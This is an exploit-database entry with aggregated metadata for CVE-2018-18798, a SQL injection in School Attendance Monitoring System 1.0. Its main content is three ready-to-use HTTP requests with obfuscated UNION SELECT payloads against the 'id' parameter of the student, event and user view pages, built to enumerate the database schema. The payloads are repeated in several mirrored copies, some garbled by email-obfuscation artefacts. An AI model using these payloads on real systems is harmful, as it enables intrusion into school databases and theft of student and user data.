ID 1337DAY-ID-31485
Type zdt
Reporter Ihsan Sencan
Modified 2018-10-31T00:00:00
Description
Exploit for php platform in category web applications
# Exploit Title: School Attendance Monitoring System 1.0 - SQL Injection
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://www.sourcecodester.com/users/janobe
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/attendancemonitoring.zip
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-18798
# POC:
# 1)
# http://localhost/[PATH]/student/index.php?view=view&id=[SQL]
#
#[PATH]/student/view.php
#01 <?php
#02 $student = New Student();
#03 $res = $student->select_student($_GET['id']);
#04
#05
#06 $course = New Course();
#07 $resCourse = $course->single_course($res->CourseID);
#08
#09 ?>
GET /[PATH]/student/index.php?view=view&id=-1%27++uniOn+seLecT+%31%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:[email protected]_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%[email protected]:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:[email protected]%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2d%2d%20%2d HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3
Connection: keep-alive
HTTP/1.1 200 OK
Date: Sun, 28 Oct 2018 19:37:01 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
# POC:
# 2)
# http://localhost/[PATH]/event/index.php?view=view&id=[SQL]
#
#[PATH]/event/view.php
#01 <?php
#02 $event = New Event();
#03 $res = $event->single_event($_GET['id']);
#04
#05
#06
#07 ?>
GET /[PATH]/event/index.php?view=view&id=-1%27++uniOn+seLecT+%31%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:[email protected]_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%[email protected]:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:[email protected]%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c%33%2c%34%2c%35%2c%36%2c%37%2d%2d%20%2d HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3
Connection: keep-alive
HTTP/1.1 200 OK
Date: Sun, 28 Oct 2018 17:12:15 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
# POC:
# 3)
# http://localhost/[PATH]/user/index.php?view=view&id=[SQL]
#
#[PATH]/user/view.php
#01 <?php
#02 $user = New User();
#03 $res = $user->single_user($_GET['id']);
#04
#05
#06
#07 ?>
GET /[PATH]/user/index.php?view=view&id=-1%27++uniOn+seLecT+%31%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:[email protected]_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%[email protected]:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:[email protected]%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c%33%2c%34%2c%35%2c%36%2c%37%2d%2d%20%2d HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3
Connection: keep-alive
HTTP/1.1 200 OK
Date: Sun, 28 Oct 2018 17:16:52 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
# 0day.today [2018-10-31] #
{"id": "1337DAY-ID-31485", "bulletinFamily": "exploit", "title": "School Attendance Monitoring System 1.0 - SQL Injection Vulnerability", "description": "Exploit for php platform in category web applications", "published": "2018-10-31T00:00:00", "modified": "2018-10-31T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://0day.today/exploit/description/31485", "reporter": "Ihsan Sencan", "references": [], "cvelist": ["CVE-2018-18798"], "type": "zdt", "lastseen": "2018-10-31T16:41:33", "edition": 1, "viewCount": 5, "enchantments": {"score": {"value": 6.5, "vector": "NONE", "modified": "2018-10-31T16:41:33", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2018-18798"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:150010"]}, {"type": "exploitdb", "idList": ["EDB-ID:45727"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:295868DCF7E82260F77E91018F176617"]}], "modified": "2018-10-31T16:41:33", "rev": 2}, "vulnersScore": 6.5}, "sourceHref": "https://0day.today/exploit/31485", "sourceData": "# Exploit Title: School Attendance Monitoring System 1.0 - SQL Injection\r\n# Exploit Author: Ihsan Sencan\r\n# Vendor Homepage: https://www.sourcecodester.com/users/janobe\r\n# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/attendancemonitoring.zip\r\n# Version: 1.0\r\n# Category: Webapps\r\n# Tested on: WiN7_x64/KaLiLinuX_x64\r\n# CVE: CVE-2018-18798\r\n \r\n# POC: \r\n# 1)\r\n# http://localhost/[PATH]/student/index.php?view=view&id=[SQL]\r\n# \r\n#[PATH]/student/view.php\r\n#01 <?php \r\n#02 $student = New Student();\r\n#03 $res = $student->select_student($_GET['id']);\r\n#04 \r\n#05 \r\n#06 $course = New Course();\r\n#07 $resCourse = $course->single_course($res->CourseID);\r\n#08 \r\n#09 ?>\r\nGET /[PATH]/student/index.php?view=view&id=-1%27++uniOn+seLecT+%31%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:[email\u00a0protected]_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%[email\u00a0protected]:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:[email\u00a0protected]%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2d%2d%20%2d HTTP/1.1\r\nHost: TARGET\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nCookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3\r\nConnection: keep-alive\r\nHTTP/1.1 200 OK\r\nDate: Sun, 28 Oct 2018 19:37:01 GMT\r\nServer: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30\r\nX-Powered-By: PHP/5.6.30\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\r\nPragma: no-cache\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\n \r\n# POC: \r\n# 2)\r\n# http://localhost/[PATH]/event/index.php?view=view&id=[SQL]\r\n# \r\n#[PATH]/event/view.php\r\n#01 <?php \r\n#02 $event = New Event();\r\n#03 $res = $event->single_event($_GET['id']);\r\n#04 \r\n#05 \r\n#06 \r\n#07 ?>\r\nGET /[PATH]/event/index.php?view=view&id=-1%27++uniOn+seLecT+%31%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:[email\u00a0protected]_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%[email\u00a0protected]:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:[email\u00a0protected]%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c%33%2c%34%2c%35%2c%36%2c%37%2d%2d%20%2d HTTP/1.1\r\nHost: TARGET\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nCookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3\r\nConnection: keep-alive\r\nHTTP/1.1 200 OK\r\nDate: Sun, 28 Oct 2018 17:12:15 GMT\r\nServer: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30\r\nX-Powered-By: PHP/5.6.30\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\r\nPragma: no-cache\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\n \r\n# POC: \r\n# 3)\r\n# http://localhost/[PATH]/user/index.php?view=view&id=[SQL]\r\n# \r\n#[PATH]/user/view.php\r\n#01 <?php \r\n#02 $user = New User();\r\n#03 $res = $user->single_user($_GET['id']);\r\n#04 \r\n#05 \r\n#06 \r\n#07 ?>\r\nGET /[PATH]/user/index.php?view=view&id=-1%27++uniOn+seLecT+%31%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:[email\u00a0protected]_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%[email\u00a0protected]:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:[email\u00a0protected]%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c%33%2c%34%2c%35%2c%36%2c%37%2d%2d%20%2d HTTP/1.1\r\nHost: TARGET\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nCookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3\r\nConnection: keep-alive\r\nHTTP/1.1 200 OK\r\nDate: Sun, 28 Oct 2018 17:16:52 GMT\r\nServer: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30\r\nX-Powered-By: PHP/5.6.30\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\r\nPragma: no-cache\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\n\n# 0day.today [2018-10-31] #", "immutableFields": []}
{"cve": [{"lastseen": "2021-02-02T06:52:33", "description": "Attendance Monitoring System 1.0 has SQL Injection via the 'id' parameter to student/index.php?view=view, event/index.php?view=view, and user/index.php?view=view.", "edition": 4, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-03-21T16:00:00", "title": "CVE-2018-18798", "type": "cve", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-18798"], "modified": "2019-03-28T17:35:00", "cpe": ["cpe:/a:school_attendance_monitoring_system_project:school_attendance_monitoring_system:1.0"], "id": "CVE-2018-18798", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-18798", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:school_attendance_monitoring_system_project:school_attendance_monitoring_system:1.0:*:*:*:*:*:*:*"]}], "packetstorm": [{"lastseen": "2018-10-30T02:22:49", "description": "", "published": "2018-10-29T00:00:00", "type": "packetstorm", "title": "School Attendance Monitoring System 1.0 SQL Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-18798"], "modified": "2018-10-29T00:00:00", "id": "PACKETSTORM:150010", "href": "https://packetstormsecurity.com/files/150010/School-Attendance-Monitoring-System-1.0-SQL-Injection.html", "sourceData": "`# Exploit Title: School Attendance Monitoring System 1.0 - SQL Injection \n# Dork: N/A \n# Date: 2018-10-29 \n# Exploit Author: Ihsan Sencan \n# Vendor Homepage: https://www.sourcecodester.com/users/janobe \n# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/attendancemonitoring.zip \n# Version: 1.0 \n# Category: Webapps \n# Tested on: WiN7_x64/KaLiLinuX_x64 \n# CVE: CVE-2018-18798 \n \n# POC: \n# 1) \n# http://localhost/[PATH]/student/index.php?view=view&id=[SQL] \n# \n#[PATH]/student/view.php \n#01 <?php \n#02 $student = New Student(); \n#03 $res = $student->select_student($_GET['id']); \n#04 \n#05 \n#06 $course = New Course(); \n#07 $resCourse = $course->single_course($res->CourseID); \n#08 \n#09 ?> \nGET /[PATH]/student/index.php?view=view&id=-1%27++uniOn+seLecT+%31%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2d%2d%20%2d HTTP/1.1 \nHost: TARGET \nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nCookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3 \nConnection: keep-alive \nHTTP/1.1 200 OK \nDate: Sun, 28 Oct 2018 19:37:01 GMT \nServer: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 \nX-Powered-By: PHP/5.6.30 \nExpires: Thu, 19 Nov 1981 08:52:00 GMT \nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 \nPragma: no-cache \nKeep-Alive: timeout=5, max=100 \nConnection: Keep-Alive \nTransfer-Encoding: chunked \nContent-Type: text/html; charset=UTF-8 \n \n# POC: \n# 2) \n# http://localhost/[PATH]/event/index.php?view=view&id=[SQL] \n# \n#[PATH]/event/view.php \n#01 <?php \n#02 $event = New Event(); \n#03 $res = $event->single_event($_GET['id']); \n#04 \n#05 \n#06 \n#07 ?> \nGET /[PATH]/event/index.php?view=view&id=-1%27++uniOn+seLecT+%31%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c%33%2c%34%2c%35%2c%36%2c%37%2d%2d%20%2d HTTP/1.1 \nHost: TARGET \nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nCookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3 \nConnection: keep-alive \nHTTP/1.1 200 OK \nDate: Sun, 28 Oct 2018 17:12:15 GMT \nServer: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 \nX-Powered-By: PHP/5.6.30 \nExpires: Thu, 19 Nov 1981 08:52:00 GMT \nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 \nPragma: no-cache \nKeep-Alive: timeout=5, max=100 \nConnection: Keep-Alive \nTransfer-Encoding: chunked \nContent-Type: text/html; charset=UTF-8 \n \n# POC: \n# 3) \n# http://localhost/[PATH]/user/index.php?view=view&id=[SQL] \n# \n#[PATH]/user/view.php \n#01 <?php \n#02 $user = New User(); \n#03 $res = $user->single_user($_GET['id']); \n#04 \n#05 \n#06 \n#07 ?> \nGET /[PATH]/user/index.php?view=view&id=-1%27++uniOn+seLecT+%31%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c%33%2c%34%2c%35%2c%36%2c%37%2d%2d%20%2d HTTP/1.1 \nHost: TARGET \nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nCookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3 \nConnection: keep-alive \nHTTP/1.1 200 OK \nDate: Sun, 28 Oct 2018 17:16:52 GMT \nServer: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 \nX-Powered-By: PHP/5.6.30 \nExpires: Thu, 19 Nov 1981 08:52:00 GMT \nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 \nPragma: no-cache \nKeep-Alive: timeout=5, max=100 \nConnection: Keep-Alive \nTransfer-Encoding: chunked \nContent-Type: text/html; charset=UTF-8 \n \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/150010/sams10-sql.txt"}], "exploitdb": [{"lastseen": "2018-11-30T12:31:32", "description": "", "published": "2018-10-29T00:00:00", "type": "exploitdb", "title": "School Attendance Monitoring System 1.0 - SQL Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-18798"], "modified": "2018-10-29T00:00:00", "id": "EDB-ID:45727", "href": "https://www.exploit-db.com/exploits/45727", "sourceData": "# Exploit Title: School Attendance Monitoring System 1.0 - SQL Injection\r\n# Dork: N/A\r\n# Date: 2018-10-29\r\n# Exploit Author: Ihsan Sencan\r\n# Vendor Homepage: https://www.sourcecodester.com/users/janobe\r\n# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/attendancemonitoring.zip\r\n# Version: 1.0\r\n# Category: Webapps\r\n# Tested on: WiN7_x64/KaLiLinuX_x64\r\n# CVE: CVE-2018-18798\r\n\r\n# POC: \r\n# 1)\r\n# http://localhost/[PATH]/student/index.php?view=view&id=[SQL]\r\n# \r\n#[PATH]/student/view.php\r\n#01 <?php \r\n#02 $student = New Student();\r\n#03 $res = $student->select_student($_GET['id']);\r\n#04 \r\n#05 \r\n#06 $course = New Course();\r\n#07 $resCourse = $course->single_course($res->CourseID);\r\n#08 \r\n#09 ?>\r\nGET /[PATH]/student/index.php?view=view&id=-1%27++uniOn+seLecT+%31%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2d%2d%20%2d HTTP/1.1\r\nHost: TARGET\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nCookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3\r\nConnection: keep-alive\r\nHTTP/1.1 200 OK\r\nDate: Sun, 28 Oct 2018 19:37:01 GMT\r\nServer: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30\r\nX-Powered-By: PHP/5.6.30\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\r\nPragma: no-cache\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n# POC: \r\n# 2)\r\n# http://localhost/[PATH]/event/index.php?view=view&id=[SQL]\r\n# \r\n#[PATH]/event/view.php\r\n#01 <?php \r\n#02 $event = New Event();\r\n#03 $res = $event->single_event($_GET['id']);\r\n#04 \r\n#05 \r\n#06 \r\n#07 ?>\r\nGET /[PATH]/event/index.php?view=view&id=-1%27++uniOn+seLecT+%31%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c%33%2c%34%2c%35%2c%36%2c%37%2d%2d%20%2d HTTP/1.1\r\nHost: TARGET\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nCookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3\r\nConnection: keep-alive\r\nHTTP/1.1 200 OK\r\nDate: Sun, 28 Oct 2018 17:12:15 GMT\r\nServer: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30\r\nX-Powered-By: PHP/5.6.30\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\r\nPragma: no-cache\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n# POC: \r\n# 3)\r\n# http://localhost/[PATH]/user/index.php?view=view&id=[SQL]\r\n# \r\n#[PATH]/user/view.php\r\n#01 <?php \r\n#02 $user = New User();\r\n#03 $res = $user->single_user($_GET['id']);\r\n#04 \r\n#05 \r\n#06 \r\n#07 ?>\r\nGET /[PATH]/user/index.php?view=view&id=-1%27++uniOn+seLecT+%31%2c(selECt(@x)fROm(selECt(@x:=0x00)%2c(@rUNNing_nuMBer:=0)%2c(@tbl:=0x00)%2c(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())aNd(0x00)in(@x:=Concat(@x%2cif((@tbl!=tABLe_name)%2cConcat(LPAD(@rUNNing_nuMBer:=@rUNNing_nuMBer%2b1%2c2%2c0x30)%2c0x303d3e%2c@tBl:=tABLe_naMe%2c(@z:=0x00))%2c%200x00)%2clpad(@z:=@z%2b1%2c2%2c0x30)%2c0x3d3e%2c0x4b6f6c6f6e3a20%2ccolumn_name%2c0x3c62723e))))x)%2c%33%2c%34%2c%35%2c%36%2c%37%2d%2d%20%2d HTTP/1.1\r\nHost: TARGET\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nCookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3\r\nConnection: keep-alive\r\nHTTP/1.1 200 OK\r\nDate: Sun, 28 Oct 2018 17:16:52 